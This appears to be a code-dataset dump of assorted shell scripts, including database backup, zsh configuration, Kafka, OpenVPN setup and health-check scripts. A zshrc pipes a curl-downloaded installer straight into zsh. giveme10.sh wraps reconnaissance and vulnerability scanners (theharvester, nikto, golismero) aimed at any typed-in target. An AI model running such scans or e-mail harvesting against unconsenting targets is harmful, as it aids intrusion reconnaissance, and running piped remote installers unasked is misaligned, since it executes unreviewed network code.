blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
91b74e3005af11dd0213644d0bdaa4021d11d7a9 | Shell | HumanBrainProject/kg-spatial-search-docker | /bin/create-db.sh | UTF-8 | 521 | 3.453125 | 3 | [] | no_license | #!/bin/sh
# Create a Solr core for the spatial search service and register its
# spatial types/fields.
# Usage: create-db.sh <core-name> [data-file] [extra register.py args...]
: "${SPATIAL_SEARCH_HOME:="${PWD}"}"
. "${SPATIAL_SEARCH_HOME}/settings.sh"
if [ -z "$1" ]
then
    echo "Missing core name." >&2
    # Fixed: the original only printed the message and kept going with an
    # empty core name; abort instead.
    exit 1
fi
core=$1
shift
if [ -n "$1" ]
then
    # Optional data file forwarded to register.py as "-f <file>".
    data="-f $1"
    shift
fi
# 1. Create the core from the default data directory; 8983 is the uid/gid
#    the Solr container runs as.
if [ ! -d "${KG_SPATIAL_SEARCH_DATA}/${core}" ]
then
    sudo cp -r "${KG_SPATIAL_SEARCH_DATA_DEFAULTS}" "${KG_SPATIAL_SEARCH_DATA}/${core}"
    sudo chown -R 8983:8983 "${KG_SPATIAL_SEARCH_DATA}"
fi
# 2. Register the Spatial types and fields
# ${data} is intentionally unquoted: it must expand to two words
# ("-f" and the file name) or to nothing at all.
"${PYTHON_ROOT}/register.py" -u "${KG_SPATIAL_SEARCH_URL}" -c "${core}" ${data} "$@"
| true |
455bd4a89f65bcab21021ca602fe510b9bb08311 | Shell | Hansel-Christopher/LAMP-script | /backup.sh | UTF-8 | 427 | 3.359375 | 3 | [] | no_license | #!/bin/bash
# Daily MySQL backup: dump ${DATABASE}, compress it, and store the
# compressed dump under /opt/backups/.
FILE=backup.sql.$(date +"%Y%m%d")
# NOTE(review): USER is assigned but never used below — mysqldump runs as
# root. Presumably left over from an earlier version; confirm before removing.
USER=${DB_USER}
# (2) in case you run this more than once a day, remove the previous version of the file
# unalias rm 2> /dev/null
# rm ${FILE} 2> /dev/null
# rm ${FILE}.gz 2> /dev/null
sudo mkdir -p /opt/backups/
# NOTE(review): bare --password makes mysqldump prompt interactively;
# confirm that is intended for this job.
mysqldump --opt --user=root --password "${DATABASE}" > "${FILE}"
# Fixed: the original moved ${FILE} to /opt/backups/ first and then ran
# gzip/ls on the now-missing file in the current directory. Compress first,
# then move the .gz into place.
gzip "$FILE"
mv "${FILE}.gz" /opt/backups/
echo "${FILE}.gz was created:"
ls -l "/opt/backups/${FILE}.gz"
5e965630dfad0d50c8b3c964cbc58fb0ac4dbe37 | Shell | deejaydarvin/config | /home/.zshrc | UTF-8 | 1,140 | 2.703125 | 3 | [] | no_license | #
# Options
#
# Extra completion functions for zsh's function search path.
fpath=(/usr/local/share/zsh-completions $fpath)
# Personal modules: each name is a file under ~/.zsh/functions/ sourced
# at the bottom of this file.
LOAD_MODULES=(
"setup"
"autocompletion"
"history"
"vim-foreground"
"vimtricks"
"zman"
"autopushd"
"homeshick"
"task"
"fasd"
"fzf"
)
# OS Specific choices...
if [[ `uname` == "Darwin" ]]; then
# OPAM configuration
source /Users/robert/.opam/opam-init/init.zsh
eval "$(/opt/homebrew/bin/brew shellenv)"
else
# Non-macOS hosts additionally load the desktop-notification module.
LOAD_MODULES+=( "notify")
fi
# zplug plugin manager: bootstrap, then declare plugins.
source ~/.zplug/init.zsh
zplug 'zplug/zplug', hook-build:'zplug --self-manage'
zplug "mafredri/zsh-async"
zplug "zsh-users/zsh-syntax-highlighting"
zplug "sindresorhus/pure", use:pure.zsh, from:github, as:theme
zplug "wookayin/fzf-fasd"
# Install plugins if there are plugins that have not been installed
if ! zplug check --verbose; then
printf "Install? [y/N]: "
if read -q; then
echo; zplug install
fi
fi
zplug load # --verbose # for more details
#### Do not change anything after this file
# command-not-found hook, when the distro provides it.
[ -r /etc/profile.d/cnf.sh ] && . /etc/profile.d/cnf.sh
# In zsh an unquoted array expands to its elements (no word-splitting
# surprises as in bash), so $LOAD_MODULES iterates one module per entry.
for module in $LOAD_MODULES; do
source "$HOME/.zsh/functions/"$module
done
# vim:set path=~/.zsh/functions/
| true |
1cafab164be2a86e0556a8dc99ac417d446ce797 | Shell | JiriHusak-lab/POC-T-REF-OCPAUTO | /wmj.sh | UTF-8 | 277 | 2.71875 | 3 | [] | no_license | #!/bin/bash
# Publish a JSON file from /opt/kafka to the warehouse-movement Kafka topic.
# Usage: wmj.sh <json-file-name>
if [ $# -ne 1 ]
then
    echo wmj.sh json-file-name >&2
    # Exit codes are 0-255; 'exit -1' is non-portable (it ends up as 255
    # in bash and is an error in strict POSIX shells).
    exit 1
fi
JSON_FILE=$1
TOPIC_NAME=warehouse-movement
APACHE_KAFKA=apache-kafka
# Feed the file straight to the producer instead of piping through cat.
bin/kafka-console-producer.sh --broker-list "${APACHE_KAFKA}:9092" --topic "${TOPIC_NAME}" < "/opt/kafka/${JSON_FILE}"
| true |
374ef0b05f3c77d06225be1d80f99e6284f8a76c | Shell | Peregrine42/elk-mini-pingu | /pinga/muxxer.sh | UTF-8 | 121 | 2.875 | 3 | [] | no_license | for target in $(./receiver.sh $2); do
# Each target emitted by receiver.sh uses '|' as a field separator;
# translate it to spaces so the fields become separate sender.sh arguments.
arguments=`echo $target | sed "s/|/ /g"`
# Fan out: one background sender per target.
./sender.sh $1 $arguments &
done
# Barrier: wait for every background sender to finish before exiting.
wait | true |
4cf173d3124dc134af1d9885e240cb2f7e31ce61 | Shell | svn2github/open64 | /opencti/trunk/bin/inview.sh | UTF-8 | 1,285 | 3.140625 | 3 | [] | no_license | #!/bin/sh
# ====================================================================
#
# Copyright (C) 2011, Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Open64 is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Open64 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# ====================================================================
# Run a command inside a ClearCase view: directly if we are already set to
# that view, otherwise via 'cleartool setview -exec'.
# Bashisms ([[ ]]) removed: the shebang is /bin/sh, so stick to POSIX test.
if [ -z "$2" ]; then
    echo " Usage: inview view-tag command args ..." >&2
    exit 1
fi
# get the specified view name
VIEW=$1
shift
# get current view name, if any
CT=/usr/eclipse/bin/cleartool
INVIEW=$(basename "$CLEARCASE_ROOT")
if [ "$VIEW" = "$INVIEW" ]; then
    # Already in the requested view: run the command directly; "$@" keeps
    # arguments containing spaces intact.
    "$@"
    RET=$?
else
    # "$*" is deliberate: setview -exec takes the command as a single string.
    "$CT" setview -exec "$*" "$VIEW"
    RET=$?
fi
exit $RET
| true |
770171cec341b1828eb5e40763ab01407425ba10 | Shell | cory011202/plexscripts | /serverHealthCheck.sh | UTF-8 | 518 | 3.25 | 3 | [] | no_license | #!/bin/bash
#ping server and check if it is alive. If not send email and wol command.
# (Addresses below are placeholders; fill in the real IP and MAC.)
SERVER=xxx.xxx.xxx.xxx
MACADDRESS=xx:xx:xx:xx:xx:xx
#echo $SERVER
if ping -c 10 "$SERVER" >/dev/null
then
    # Two spaces before '--' preserve the original log format, where the
    # date and the message were separate echo arguments.
    echo "$(date)  -- Its Alive" >> /scripts/serverHealth.log
else
    echo "$(date)  -- Server is down. Trying to start" | mail -s "Server IS DOWN" user@mail.com
    echo "$(date)  -- Sent email as server is down" >> /scripts/serverHealth.log
    # echo "Waking up $SERVER"
    # Send a wake-on-LAN magic packet to try to power the server back up.
    /usr/bin/wakeonlan "$MACADDRESS"
fi
| true |
d1448d08e2e08c4aee95f2cd0afb0c2870655152 | Shell | nelsonmorais/azure-iot | /colors.azcli | UTF-8 | 168 | 2.65625 | 3 | [] | no_license | #!/bin/bash
# Define a set of colors to be used on the bash echo
# NOTE: these are literal "\e[..m" strings (bash does not interpret
# backslash escapes inside quotes); they only render as colors when
# printed with 'echo -e' or printf's %b.
reset="\e[0m"
red="\e[31m"
green="\e[32m"
yellow="\e[33m"
blue="\e[34m"
magenta="\e[35m"
cyan="\e[36m"
6fbaa5f79cce1f37c4bbc85d765d236f03fc54ff | Shell | 5l1v3r1/faculdade | /giveme10.sh | UTF-8 | 6,293 | 3.53125 | 4 | [] | no_license | #!/bin/bash
#
# Luis Fernando
#
# pwx - jonatas fil
# CONFIG
# Populate the global color variables used throughout the script.
# The values are literal "\033[..m" sequences (bash keeps the backslash
# as-is inside quotes), so they only colorize output when printed with
# 'echo -e'.
Colors() {
    Escape='\033'
    white="${Escape}[0m"      # default attributes
    RedF="${Escape}[31m"      # red foreground
    GreenF="${Escape}[32m"    # green foreground
    YellowF="${Escape}[33m"   # yellow foreground
    BlueF="${Escape}[34m"     # blue foreground
    CyanF="${Escape}[36m"     # cyan foreground
    Reset="${Escape}[0m"      # reset attributes
}
#
#
# INSTALL
#
#
/usr/bin/notify-send -t 5000 "Aguarde..."
# check if whois installation exists
# NOTE(fix): the original checks were '[ -d $find ]' with $find never set;
# a one-argument test '[ -d ]' is always true, so the "not installed"
# branch could never run. 'command -v <tool>' actually tests whether the
# tool is available on $PATH.
clear
if command -v whois > /dev/null 2>&1; then
Colors;
echo [*][whois]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require whois installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install whois
fi
sleep 1
clear
# check if dnsrecon installation exists
if command -v dnsrecon > /dev/null 2>&1; then
Colors;
echo [*]:[dnsrecon]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require dnsrecon installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install dnsrecon
fi
sleep 1
clear
# check if theharvester installation exists
if command -v theharvester > /dev/null 2>&1; then
Colors;
echo [*][theharvester]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require theharvester installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install theharvester
fi
sleep 1
clear
# check if golismero installation exists
if command -v golismero > /dev/null 2>&1; then
Colors;
echo [*]:[golismero]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require golismero installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install golismero
fi
sleep 1
clear
# check if nikto installation exists
if command -v nikto > /dev/null 2>&1; then
Colors;
echo [*]:[nikto]:installation found!;
else
Colors;
echo ${RedF}[x]:[warning]:this script require nikto installed to work ${Reset};
echo ${GreenF}[!]${RedF}:${GreenF}[please wait]: Downloading from network... ${Reset};
sleep 3
apt-get install nikto
fi
sleep 1
clear
# MENU
Colors;
# Main menu: draw the option list, read the user's choice, and dispatch to
# the matching sh_* handler. The handlers call back into this function, so
# the menu loops until the user picks 'e' (exit).
Principal () {
/usr/bin/notify-send -t 5000 "Bem vindo !"
cat <<!
G I V E M E 1 0
---------------------------#
1) - Verificar IP Externo #
2) - Verificar Data/horas #
3) - Whois em Dominio #
4) - Analise em DNS #
5) - Searching Emails #
6) - Scan Vuln [golismero] #
7) - Scan Vuln [Nikto] #
e) - Sair #
---------------------------#
!
echo -n "Qual a opção desejada ? "
read opcao
# Dispatch table; any unknown input redisplays the menu after 2 seconds.
case $opcao in
1) sh_ext ;;
2) sh_data ;;
3) sh_whois ;;
4) sh_dns ;;
5) sh_email ;;
6) sh_goli ;;
7) sh_nikto ;;
e) sh_sair ;;
*) echo "\"$opcao\" Opção inválida!"; sleep 2; Principal ;;
esac
}
# IP EXTERNO
Colors;
# Show the machine's external IP address (via ifconfig.me), then return to
# the main menu.
sh_ext () {
Colors;
clear
echo [Aguarde, verificando seu ip externo...];
sleep 3
curl ifconfig.me
/usr/bin/notify-send -t 5000 "verificação de ip externo [OK]"
sleep 2
echo -n "Deseja voltar para o menu de Opções ? (yes):"
read yes
clear
# Fixed: the menu function is named 'Principal'; the old 'sh_Principal'
# call failed with "command not found" and never returned to the menu.
Principal
}
# DATA
Colors;
# Display the current date and time, then return to the main menu.
sh_data () {
Colors;
clear
echo [Aguarde, verificando as horas e a data de hoje...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "verificação de Data e horario [OK]"
echo "Data/horario de hoje: "
date
sleep 2
echo -n "Deseja voltar para o menu de Opções ? (yes):"
read yes
clear
# Fixed: 'sh_Principal' does not exist; the menu function is 'Principal'.
Principal
}
# WHOIS
Colors;
# Prompt for a domain and run a whois lookup on it.
sh_whois () {
Colors;
clear
echo [Aguarde, o Whois está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do whois [OK]"
echo -n "Digite o dominio :"
read domin
# Quoted so a domain typed with stray spaces stays a single argument.
whois "$domin"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
# Fixed: 'sh_Principal' does not exist; the menu function is 'Principal'.
Principal
}
# DNS
Colors;
# Prompt for a domain and output file, then run dnsrecon with XML output.
sh_dns () {
Colors;
clear
echo [Aguarde, o dnsrecon está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do dnsrecon [OK]"
echo -n "Digite o dominio :"
read dominio
echo -n "Digite o nome do arquivo output [.xml]: [output.xml]"
read output
# User-supplied values quoted to keep each one a single argument.
dnsrecon -d "$dominio" --xml "$output"
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
# Fixed: 'sh_Principal' does not exist; the menu function is 'Principal'.
Principal
}
# EMAIL
Colors;
# Prompt for a domain and output file, then harvest e-mail addresses for it
# with theharvester (all sources, 500 results).
sh_email () {
Colors;
clear
echo [Aguarde, o theharvester está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do theharvester [OK]"
echo -n "Digite o dominio :"
read domi
echo -n "Digite o nome do arquivo output: [output.txt]"
read output
# User-supplied values quoted to keep each one a single argument.
theharvester -d "$domi" -l 500 -b all -f "$output"
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
# Fixed: 'sh_Principal' does not exist; the menu function is 'Principal'.
Principal
}
# golismero
Colors;
# Prompt for a target and output file, then run a golismero vulnerability scan.
sh_goli () {
Colors;
clear
echo [Aguarde, o golismero está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do golismero [OK]"
echo -n "Digite o alvo :"
read alvo
echo -n "Digite o nome do arquivo output: [output.txt]"
read output
# User-supplied values quoted to keep each one a single argument.
golismero scan "$alvo" -o "$output"
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
# Fixed: 'sh_Principal' does not exist; the menu function is 'Principal'.
Principal
}
# nikto
Colors;
# Prompt for a target and output file, then run a nikto web-server scan,
# saving the report to the chosen file.
sh_nikto () {
Colors;
clear
echo [Aguarde, o nikto está sendo preparado...];
sleep 3
clear
/usr/bin/notify-send -t 5000 "Inicialização do nikto [OK]"
echo -n "Digite o alvo :"
read alvo
echo -n "Digite o nome do arquivo output: [output.txt]"
read output
# Fixed: the original used a literal '»' character, which nikto received
# as an argument instead of the intended shell redirection, so the report
# was never written. Append the scan output to the requested file.
nikto -h "$alvo" >> "$output"
sleep 2
echo "O relatorio está salvo no arquivo do output...[$output]"
sleep 2
echo -n "Deseja voltar para o menu de Opções? (yes):"
read yes
clear
# Fixed: 'sh_Principal' does not exist; the menu function is 'Principal'.
Principal
}
# SAIR
# Exit handler: notify the user and terminate the script.
sh_sair () {
clear
echo "Saindo..."
/usr/bin/notify-send -t 5000 "Saindo do script..."
sleep 2
clear
exit
}
# Entry point: show the main menu.
Principal
| true |
1aed21cd3fb2ddea91d99816bf82033d275f7ed1 | Shell | mewin-archived/ROSChroot | /run_bash.sh | UTF-8 | 305 | 2.984375 | 3 | [
"WTFPL"
] | permissive | #!/bin/bash
source _common.sh
if [ `id -u` -ne 0 ] ; then
sudo bash "$0" "$HOME/.Xauthority"
exit
fi
if [ -n "$1" ] ; then
cp "$1" "$CHROOT_ROOT/home/$CHROOT_USER/.Xauthority"
fi
xhost +
source _chroot_prelude.sh
chroot "$CHROOT_ROOT" sudo -u $CHROOT_USER /bin/bash
source _chroot_epilogue.sh
| true |
496ee7bb5bfb742726f1e6bcd6af642535ceaac4 | Shell | jkugelman/dotfiles | /.zshrc | UTF-8 | 8,564 | 3.546875 | 4 | [] | no_license | if ! [[ -d ~/.zplug ]]; then
printf 'Install zplug? [y/N]: '
read -q || return
echo
curl -sL --proto-redir -all,https https://raw.githubusercontent.com/zplug/installer/master/installer.zsh | zsh
sleep 1 # Why is this needed? Without it, init.zsh is missing on Raspberry Pi.
echo
fi
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
source ~/.zplug/init.zsh
# Use emacs keybindings even if our EDITOR is set to vi. Need to set this early.
bindkey -e
# Automatically cd to my favorite directories.
setopt auto_cd
cdpath=(
~/
)
# Customize completion.
setopt auto_list list_packed
autoload -U compinit
zstyle ':completion:*' menu select=2
zmodload zsh/complist
compinit
_comp_options+=(globdots) # Include hidden files.
# Set window title.
# Based on <https://github.com/mdarocha/zsh-windows-title>
case $TERM in
xterm*|termite)
precmd () {
dir=${PWD/#$HOME/'~'}
command=$(history | tail -n1 | awk '{for (i=2;i<=NF-1;i++) printf $i " "; print $NF}')
print -Pn "\e]0;$dir ❯ $command\a"
}
;;
esac
# Shell theme. Same Powerlevel9k just faster.
zplug 'romkatv/powerlevel10k', as:theme, if:'[[ $TERM == *256* ]]'
# This plugin enables directory navigation similar to using back and forward on
# browsers or common file explorers like Finder or Nautilus. It uses a small zle
# trick that lets you cycle through your directory stack left or right using
# Ctrl + Shift + Left / Right. This is useful when moving back and forth between
# directories in development environments, and can be thought of as kind of a
# nondestructive pushd/popd.
zplug 'plugins/dircycle', from:oh-my-zsh
bindkey '^[[1;3D' insert-cycledleft # Alt-Left
bindkey '^[[1;3C' insert-cycledright # Alt-Right
setopt auto_pushd pushd_ignore_dups
# Press Alt-Up to go up a directory, Alt-Down to go back down.
_chdir-parent() {
cd ..
_chdir-reset-prompt
}
_chdir-descendant() {
[[ "${dirstack[1]}" == "$PWD"/* ]] && popd >/dev/null
_chdir-reset-prompt
}
_chdir-reset-prompt() {
local fn
for fn (chpwd $chpwd_functions precmd $precmd_functions); do
(( $+functions[$fn] )) && $fn
done
zle reset-prompt
}
zle -N _chdir-parent
zle -N _chdir-descendant
bindkey '^[[1;3A' _chdir-parent # Alt-Up
bindkey '^[[1;3B' _chdir-descendant # Alt-Down
# * ccat <file> [files]: colorize the contents of the file (or files, if more
# than one are provided). If no arguments are passed it will colorize the
# standard input or stdin.
#
# * cless <file> [files]: colorize the contents of the file (or files, if more
# than one are provided) and open less. If no arguments are passed it will
# colorize the standard input or stdin.
zplug 'plugins/colorize', from:oh-my-zsh
# Fish-like fast/unobtrusive autosuggestions for zsh. It suggests commands as
# you type based on history and completions.
zplug 'zsh-users/zsh-autosuggestions'
# This package provides syntax highlighting for the shell zsh. It enables
# highlighting of commands whilst they are typed at a zsh prompt into an
# interactive terminal. This helps in reviewing commands before running them,
# particularly in catching syntax errors.
zplug 'zsh-users/zsh-syntax-highlighting', defer:2
# This plugin starts automatically ssh-agent to set up and load whichever
# credentials you want for ssh connections.
zplug 'plugins/ssh-agent', from:oh-my-zsh
# If a command is not recognized in the $PATH, this will use Ubuntu's
# command-not-found package to find it or suggest spelling mistakes.
#
# Don't use this, it doesn't print an error if there's no suggestion:
# zplug 'plugins/command-not-found', from:oh-my-zsh
if [[ -x /usr/lib/command-not-found ]] ; then
if (( ! ${+functions[command_not_found_handler]} )) ; then
function command_not_found_handler {
[[ -x /usr/lib/command-not-found ]] || return 1
/usr/lib/command-not-found -- ${1+"$1"} && :
}
fi
fi
# Press Alt-S to run `git status`.
_zsh-git-status() { _zsh-run-command 'git status'; }
zle -N _zsh-git-status
bindkey '^[s' _zsh-git-status
# Press Alt-D to run `git diff`.
_zsh-git-diff() { _zsh-run-command 'git diff'; }
zle -N _zsh-git-diff
bindkey '^[d' _zsh-git-diff
# Press Alt-C to run `git diff --cached`.
_zsh-git-diff-cached() { _zsh-run-command 'git diff --cached'; }
zle -N _zsh-git-diff-cached
bindkey '^[c' _zsh-git-diff-cached
# Press Alt-L to run `git log`.
_zsh-git-log() { _zsh-run-command 'git lg'; }
zle -N _zsh-git-log
bindkey '^[l' _zsh-git-log
# Press Alt-R to reload the shell.
_zsh-reload-shell() { _zsh-run-command "$(printf 'exec %q' "$SHELL")"; }
zle -N _zsh-reload-shell
bindkey '^[r' _zsh-reload-shell
# Press Ctrl-Z to resume vi.
_zsh-resume-vi() { _zsh-run-command 'fg %vi'; }
zle -N _zsh-resume-vi
bindkey '^Z' _zsh-resume-vi
# Run a command if the user hasn't typed anything.
_zsh-run-command() {
[[ -z $BUFFER ]] || return 0
BUFFER=$1
zle accept-line
}
# Share history among sessions.
setopt hist_ignore_all_dups
#setopt share_history
# Keep 1000 lines of history within the shell and save it to ~/.zsh_history.
HISTSIZE=100000
SAVEHIST=100000
HISTFILE=~/.zsh_history
# Fix key bindings. From https://wiki.archlinux.org/title/Zsh#Key_bindings.
typeset -g -A key
key[Home]="${terminfo[khome]}"
key[End]="${terminfo[kend]}"
key[Insert]="${terminfo[kich1]}"
key[Backspace]="${terminfo[kbs]}"
key[Delete]="${terminfo[kdch1]}"
key[Up]="${terminfo[kcuu1]}"
key[Down]="${terminfo[kcud1]}"
key[Left]="${terminfo[kcub1]}"
key[Right]="${terminfo[kcuf1]}"
key[PageUp]="${terminfo[kpp]}"
key[PageDown]="${terminfo[knp]}"
key[Shift-Tab]="${terminfo[kcbt]}"
key[Ctrl-Left]="${terminfo[kLFT5]}"
key[Ctrl-Right]="${terminfo[kRIT5]}"
# TERM=screen-256color is missing these key entries.
[[ -z "${key[Ctrl-Left]}" ]] && key[Ctrl-Left]="$(tput -T xterm kLFT5)"
[[ -z "${key[Ctrl-Right]}" ]] && key[Ctrl-Right]="$(tput -T xterm kRIT5)"
[[ -n "${key[Home]}" ]] && bindkey -- "${key[Home]}" beginning-of-line
[[ -n "${key[End]}" ]] && bindkey -- "${key[End]}" end-of-line
[[ -n "${key[Insert]}" ]] && bindkey -- "${key[Insert]}" overwrite-mode
[[ -n "${key[Backspace]}" ]] && bindkey -- "${key[Backspace]}" backward-delete-char
[[ -n "${key[Delete]}" ]] && bindkey -- "${key[Delete]}" delete-char
[[ -n "${key[Up]}" ]] && bindkey -- "${key[Up]}" up-line-or-history
[[ -n "${key[Down]}" ]] && bindkey -- "${key[Down]}" down-line-or-history
[[ -n "${key[Left]}" ]] && bindkey -- "${key[Left]}" backward-char
[[ -n "${key[Right]}" ]] && bindkey -- "${key[Right]}" forward-char
[[ -n "${key[PageUp]}" ]] && bindkey -- "${key[PageUp]}" beginning-of-buffer-or-history
[[ -n "${key[PageDown]}" ]] && bindkey -- "${key[PageDown]}" end-of-buffer-or-history
[[ -n "${key[Shift-Tab]}" ]] && bindkey -- "${key[Shift-Tab]}" reverse-menu-complete
[[ -n "${key[Ctrl-Left]}" ]] && bindkey -- "${key[Ctrl-Left]}" backward-word
[[ -n "${key[Ctrl-Right]}" ]] && bindkey -- "${key[Ctrl-Right]}" forward-word
# VSCode needs extra bindings for Home and End.
bindkey -- $'\e[H' beginning-of-line
bindkey -- $'\e[F' end-of-line
# Add to PATH. Don't allow duplicates.
typeset -U path
path=(~/.local/bin ~/bin $path)
# Alias to make working with .dotfiles easier.
dotfiles() {
git --git-dir="$HOME"/.dotfiles --work-tree="$HOME" "$@"
}
# Install plugins if there are plugins that have not been installed.
if ! zplug check --verbose; then
printf "Install plugins? [y/N]: "
if read -q; then
echo; zplug install
fi
fi
# Then, source plugins and add commands to $PATH.
zplug load
# Customize plugins/screen status line. Have to do this after it's loaded.
TAB_TITLE_PREFIX='"`'$_GET_PATH' | sed "s:..*/::"`$PROMPT_CHAR"'
TAB_TITLE_PROMPT=''
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
# Source functions/aliases shared with other shells.
[[ ! -f ~/.config/common.shrc ]] || source ~/.config/common.shrc
# Source local customizations.
[[ ! -f ~/.config/local.zshrc ]] || source ~/.config/local.zshrc
| true |
665d8753f83f2269e577005a6fd11bbfe30e62b0 | Shell | JakduK/friendly-gamnamu | /open-vpn/install-open-vpn.sh | UTF-8 | 3,008 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# CentOS 7 에서 OpenVPN 설치를 위한 스크립트
# 스크립트 얻는법 : wget https://raw.githubusercontent.com/JakduK/friendly-gamnamu/master/open-vpn/install-open-vpn.sh
# 문서 참고
# https://www.digitalocean.com/community/tutorials/how-to-set-up-and-configure-an-openvpn-server-on-centos-7
# https://phoenixnap.com/kb/openvpn-centos
# https://github.com/OpenVPN/easy-rsa/
echo "* Update the CentOS repositories and packages. *"
yum update -y
echo "* Enable the EPEL repository. *"
yum install epel-release -y
echo "* Again update the CentOS repositories and packages. *"
yum update -y
echo "* Install OpenVPN. *"
yum install -y openvpn
echo "* Download Easy RSA latest version. *"
wget https://github.com/OpenVPN/easy-rsa/archive/v3.1.0.tar.gz
tar -xf v3.1.0.tar.gz
rm -f v3.1.0.tar.gz
mv easy-rsa-3.1.0 /etc/openvpn/easy-rsa
echo "* Setup server.conf file. *"
OPEN_VPN_CONF_DIR=/etc/openvpn
if [ ! -f $OPEN_VPN_CONF_DIR/server.conf ]; then
wget https://raw.githubusercontent.com/JakduK/friendly-gamnamu/master/open-vpn/server.conf -P $OPEN_VPN_CONF_DIR
else
echo "WARN : OpenVPN server.conf file already exists"
fi
echo "* Setup vars file. *"
if [ ! -f $OPEN_VPN_CONF_DIR/easy-rsa/easyrsa3 ]; then
wget https://raw.githubusercontent.com/JakduK/friendly-gamnamu/master/open-vpn/vars -P $OPEN_VPN_CONF_DIR/easy-rsa/easyrsa3
else
echo "WARN : OpenVPN vars file already exists"
fi
echo "* Create key for HMAC firewall *"
openvpn --genkey --secret /etc/openvpn/myvpn.tlsauth
echo "* Building the certificate authority. *"
cd /etc/openvpn/easy-rsa/easyrsa3
./easyrsa clean-all
rm -f /etc/openvpn/easy-rsa/easyrsa3/pki/vars
# CA 는 직접 입력 필요 e.g. openvpn.jakduk.dev
./easyrsa build-ca nopass
echo "* Create a key and certificate for the server. *"
# PEM pass phrase는 직접 입력 필요
./easyrsa build-server-full server nopass
echo "* Generate a Diffie-Hellman key exchange file. *"
./easyrsa gen-dh
echo "* Create a certificate and key for client1. *"
# /etc/openvpn/easy-rsa/easyrsa3 디렉터리에서 실행해야 함
# PEM pass phrase는 직접 입력 필요
./easyrsa build-client-full client1
echo "* Copy key and certificate files to /etc/openvpn *"
cp /etc/openvpn/easy-rsa/easyrsa3/pki/ca.crt /etc/openvpn/easy-rsa/easyrsa3/pki/dh.pem /etc/openvpn
cp /etc/openvpn/easy-rsa/easyrsa3/pki/issued/server.crt /etc/openvpn/easy-rsa/easyrsa3/pki/dh.pem /etc/openvpn
cp /etc/openvpn/easy-rsa/easyrsa3/pki/private/ca.key /etc/openvpn/easy-rsa/easyrsa3/pki/private/server.key /etc/openvpn
echo "* Modify Firewall *"
firewall-cmd --zone=public --add-service openvpn
firewall-cmd --zone=public --add-service openvpn --permanent
#firewall-cmd --add-masquerade
#firewall-cmd --add-masquerade --permanent
echo "* Enable OpenVPN *"
systemctl start openvpn@server.service
# systemd-tty-ask-password-agent 를 실행해서 비밀번호를 넣어야 한다.
# ./easyrsa build-server-full server nopass 로 하면 안해도 됨
# systemctl enable openvpn@server.service
| true |
398843abda377dceb4030a59392e378d0521c5af | Shell | pyhero/nagiosauto | /functions/sync_conf.sh | UTF-8 | 212 | 3.15625 | 3 | [] | no_license | #!/bin/bash
DIR=$(cd `dirname $0`;echo $PWD)
## source global variables.
funs="$DIR/xscripts/functions"
if [ ! -f $funs ];then
echo -e "\e[32m$funs\e[0m: not exist."
exit 6
else
source $funs
fi
sync_remote
| true |
efa754fd1a6d8bfbf9833275367deeed4e0406f3 | Shell | tuxcodejohn/toolfabrik | /scripts/findwin.sh | UTF-8 | 260 | 2.578125 | 3 | [] | no_license | #!/bin/bash
#me wants to be an awesom shortcut...
WIN=$( wmctrl -l | \
dmenu -i -l 32 -fn -*-fixed-*-*-normal--15-*-*-*-*-*-*-1 \
-nb black -nf green -sb red -sf green | \
awk -F' ' '{ print $1 }')
if [ $WIN ]
then
echo $WIN && wmctrl -i -a $WIN
fi
| true |
